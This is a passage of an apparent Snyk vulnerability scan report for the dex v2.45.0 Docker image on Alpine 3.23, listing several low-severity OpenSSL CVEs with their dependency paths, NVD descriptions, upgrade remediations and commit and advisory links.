<li><a href="https://github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616">https://github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df5340923fa807f">https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df5340923fa807f</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248172a">https://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248172a</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686">https://github.com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686</a></li>
|
||
<li><a href="https://openssl-library.org/news/secadv/20260407.txt">https://openssl-library.org/news/secadv/20260407.txt</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-ALPINE323-OPENSSL-15993259">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--low" data-snyk-test="low">
|
||
<h2 class="card__title">CVE-2026-2673</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--low">
|
||
<span class="label__text">low severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Package Manager: alpine:3.23
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
openssl/libcrypto3
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0 and openssl/libcrypto3@3.5.5-r0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="nvd-description">NVD Description</h2>
|
||
<p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>openssl</code> package and not the <code>openssl</code> package as distributed by <code>Alpine</code>.</em>
|
||
<em>See <code>How to fix?</code> for <code>Alpine:3.23</code> relevant fixed versions and status.</em></p>
|
||
<p>Issue summary: An OpenSSL TLS 1.3 server may fail to negotiate the expected
|
||
preferred key exchange group when its key exchange group configuration includes
|
||
the default by using the 'DEFAULT' keyword.</p>
|
||
<p>Impact summary: A less preferred key exchange may be used even when a more
|
||
preferred group is supported by both client and server, if the group
|
||
was not included among the client's initial predicated keyshares.
|
||
This will sometimes be the case with the new hybrid post-quantum groups,
|
||
if the client chooses to defer their use until specifically requested by
|
||
the server.</p>
|
||
<p>If an OpenSSL TLS 1.3 server's configuration uses the 'DEFAULT' keyword to
|
||
interpolate the built-in default group list into its own configuration, perhaps
|
||
adding or removing specific elements, then an implementation defect causes the
|
||
'DEFAULT' list to lose its 'tuple' structure, and all server-supported groups
|
||
were treated as a single sufficiently secure 'tuple', with the server not
|
||
sending a Hello Retry Request (HRR) even when a group in a more preferred tuple
|
||
was mutually supported.</p>
|
||
<p>As a result, the client and server might fail to negotiate a mutually supported
|
||
post-quantum key agreement group, such as 'X25519MLKEM768', if the client's
|
||
configuration results in only 'classical' groups (such as 'X25519' being the
|
||
only ones in the client's initial keyshare prediction).</p>
|
||
<p>OpenSSL 3.5 and later support a new syntax for selecting the most preferred TLS
|
||
1.3 key agreement group on TLS servers. The old syntax had a single 'flat'
|
||
list of groups, and treated all the supported groups as sufficiently secure.
|
||
If any of the keyshares predicted by the client were supported by the server
|
||
the most preferred among these was selected, even if other groups supported by
|
||
the client, but not included in the list of predicted keyshares would have been
|
||
more preferred, if included.</p>
|
||
<p>The new syntax partitions the groups into distinct 'tuples' of roughly
|
||
equivalent security. Within each tuple the most preferred group included among
|
||
the client's predicted keyshares is chosen, but if the client supports a group
|
||
from a more preferred tuple, but did not predict any corresponding keyshares,
|
||
the server will ask the client to retry the ClientHello (by issuing a Hello
|
||
Retry Request or HRR) with the most preferred mutually supported group.</p>
|
||
<p>The above works as expected when the server's configuration uses the built-in
|
||
default group list, or explicitly defines its own list by directly defining the
|
||
various desired groups and group 'tuples'.</p>
|
||
<p>No OpenSSL FIPS modules are affected by this issue, the code in question lies
|
||
outside the FIPS boundary.</p>
|
||
<p>OpenSSL 3.6 and 3.5 are vulnerable to this issue.</p>
|
||
<p>OpenSSL 3.6 users should upgrade to OpenSSL 3.6.2 once it is released.
|
||
OpenSSL 3.5 users should upgrade to OpenSSL 3.5.6 once it is released.</p>
|
||
<p>OpenSSL 3.4, 3.3, 3.0, 1.0.2 and 1.1.1 are not affected by this issue.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>Alpine:3.23</code> <code>openssl</code> to version 3.5.6-r0 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/openssl/openssl/commit/2157c9d81f7b0bd7dfa25b960e928ec28e8dd63f">https://github.com/openssl/openssl/commit/2157c9d81f7b0bd7dfa25b960e928ec28e8dd63f</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/85977e013f32ceb96aa034c0e741adddc1a05e34">https://github.com/openssl/openssl/commit/85977e013f32ceb96aa034c0e741adddc1a05e34</a></li>
|
||
<li><a href="https://openssl-library.org/news/secadv/20260313.txt">https://openssl-library.org/news/secadv/20260313.txt</a></li>
|
||
<li><a href="http://www.openwall.com/lists/oss-security/2026/03/13/3">http://www.openwall.com/lists/oss-security/2026/03/13/3</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-ALPINE323-OPENSSL-15993264">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--low" data-snyk-test="low">
|
||
<h2 class="card__title">CVE-2026-31789</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--low">
|
||
<span class="label__text">low severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Package Manager: alpine:3.23
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
openssl/libcrypto3
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0 and openssl/libcrypto3@3.5.5-r0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="nvd-description">NVD Description</h2>
|
||
<p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>openssl</code> package and not the <code>openssl</code> package as distributed by <code>Alpine</code>.</em>
|
||
<em>See <code>How to fix?</code> for <code>Alpine:3.23</code> relevant fixed versions and status.</em></p>
|
||
<p>Issue summary: Converting an excessively large OCTET STRING value to
|
||
a hexadecimal string leads to a heap buffer overflow on 32 bit platforms.</p>
|
||
<p>Impact summary: A heap buffer overflow may lead to a crash or possibly
|
||
an attacker controlled code execution or other undefined behavior.</p>
|
||
<p>If an attacker can supply a crafted X.509 certificate with an excessively
|
||
large OCTET STRING value in extensions such as the Subject Key Identifier
|
||
(SKID) or Authority Key Identifier (AKID) which are being converted to hex,
|
||
the size of the buffer needed for the result is calculated as multiplication
|
||
of the input length by 3. On 32 bit platforms, this multiplication may overflow
|
||
resulting in the allocation of a smaller buffer and a heap buffer overflow.</p>
|
||
<p>Applications and services that print or log contents of untrusted X.509
|
||
certificates are vulnerable to this issue. As the certificates would have
|
||
to have sizes of over 1 Gigabyte, printing or logging such certificates
|
||
is a fairly unlikely operation and only 32 bit platforms are affected,
|
||
this issue was assigned Low severity.</p>
|
||
<p>The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this
|
||
issue, as the affected code is outside the OpenSSL FIPS module boundary.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>Alpine:3.23</code> <code>openssl</code> to version 3.5.6-r0 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde">https://github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa65ecf">https://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa65ecf</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49">https://github.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9">https://github.com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9930f0521">https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9930f0521</a></li>
|
||
<li><a href="https://openssl-library.org/news/secadv/20260407.txt">https://openssl-library.org/news/secadv/20260407.txt</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-ALPINE323-OPENSSL-15993266">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--low" data-snyk-test="low">
|
||
<h2 class="card__title">CVE-2026-28387</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--low">
|
||
<span class="label__text">low severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Package Manager: alpine:3.23
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
openssl/libcrypto3
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0 and openssl/libcrypto3@3.5.5-r0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="nvd-description">NVD Description</h2>
|
||
<p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>openssl</code> package and not the <code>openssl</code> package as distributed by <code>Alpine</code>.</em>
|
||
<em>See <code>How to fix?</code> for <code>Alpine:3.23</code> relevant fixed versions and status.</em></p>
|
||
<p>Issue summary: An uncommon configuration of clients performing DANE TLSA-based
|
||
server authentication, when paired with uncommon server DANE TLSA records, may
|
||
result in a use-after-free and/or double-free on the client side.</p>
|
||
<p>Impact summary: A use after free can have a range of potential consequences
|
||
such as the corruption of valid data, crashes or execution of arbitrary code.</p>
|
||
<p>However, the issue only affects clients that make use of TLSA records with both
|
||
the PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate
|
||
usage.</p>
|
||
<p>By far the most common deployment of DANE is in SMTP MTAs for which RFC7672
|
||
recommends that clients treat as 'unusable' any TLSA records that have the PKIX
|
||
certificate usages. These SMTP (or other similar) clients are not vulnerable
|
||
to this issue. Conversely, any clients that support only the PKIX usages, and
|
||
ignore the DANE-TA(2) usage are also not vulnerable.</p>
|
||
<p>The client would also need to be communicating with a server that publishes a
|
||
TLSA RRset with both types of TLSA records.</p>
|
||
<p>No FIPS modules are affected by this issue, the problem code is outside the
|
||
FIPS module boundary.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>Alpine:3.23</code> <code>openssl</code> to version 3.5.6-r0 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b">https://github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe">https://github.com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3">https://github.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339df0a7">https://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339df0a7</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16ad7db8177">https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16ad7db8177</a></li>
|
||
<li><a href="https://openssl-library.org/news/secadv/20260407.txt">https://openssl-library.org/news/secadv/20260407.txt</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-ALPINE323-OPENSSL-15993268">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--low" data-snyk-test="low">
|
||
<h2 class="card__title">CVE-2026-31790</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--low">
|
||
<span class="label__text">low severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Package Manager: alpine:3.23
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
openssl/libcrypto3
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0 and openssl/libcrypto3@3.5.5-r0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="nvd-description">NVD Description</h2>
|
||
<p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>openssl</code> package and not the <code>openssl</code> package as distributed by <code>Alpine</code>.</em>
|
||
<em>See <code>How to fix?</code> for <code>Alpine:3.23</code> relevant fixed versions and status.</em></p>
|
||
<p>Issue summary: Applications using RSASVE key encapsulation to establish
|
||
a secret encryption key can send contents of an uninitialized memory buffer to
|
||
a malicious peer.</p>
|
||
<p>Impact summary: The uninitialized buffer might contain sensitive data from the
|
||
previous execution of the application process which leads to sensitive data
|
||
leakage to an attacker.</p>
|
||
<p>RSA_public_encrypt() returns the number of bytes written on success and -1
|
||
on error. The affected code tests only whether the return value is non-zero.
|
||
As a result, if RSA encryption fails, encapsulation can still return success to
|
||
the caller, set the output lengths, and leave the caller to use the contents of
|
||
the ciphertext buffer as if a valid KEM ciphertext had been produced.</p>
|
||
<p>If applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an
|
||
attacker-supplied invalid RSA public key without first validating that key,
|
||
then this may cause stale or uninitialized contents of the caller-provided
|
||
ciphertext buffer to be disclosed to the attacker in place of the KEM
|
||
ciphertext.</p>
|
||
<p>As a workaround calling EVP_PKEY_public_check() or
|
||
EVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate
|
||
the issue.</p>
|
||
<p>The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>Alpine:3.23</code> <code>openssl</code> to version 3.5.6-r0 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/openssl/openssl/commit/001e01db3e996e13ffc72386fe79d03a6683b5ac">https://github.com/openssl/openssl/commit/001e01db3e996e13ffc72386fe79d03a6683b5ac</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/abd8b2eec7e3f3fda60ecfb68498b246b52af482">https://github.com/openssl/openssl/commit/abd8b2eec7e3f3fda60ecfb68498b246b52af482</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/b922e24e5b23ffb9cb9e14cadff23d91e9f7e406">https://github.com/openssl/openssl/commit/b922e24e5b23ffb9cb9e14cadff23d91e9f7e406</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/d5f8e71cd0a54e961d0c3b174348f8308486f790">https://github.com/openssl/openssl/commit/d5f8e71cd0a54e961d0c3b174348f8308486f790</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/eed200f58cd8645ed77e46b7e9f764e284df379e">https://github.com/openssl/openssl/commit/eed200f58cd8645ed77e46b7e9f764e284df379e</a></li>
|
||
<li><a href="https://openssl-library.org/news/secadv/20260407.txt">https://openssl-library.org/news/secadv/20260407.txt</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
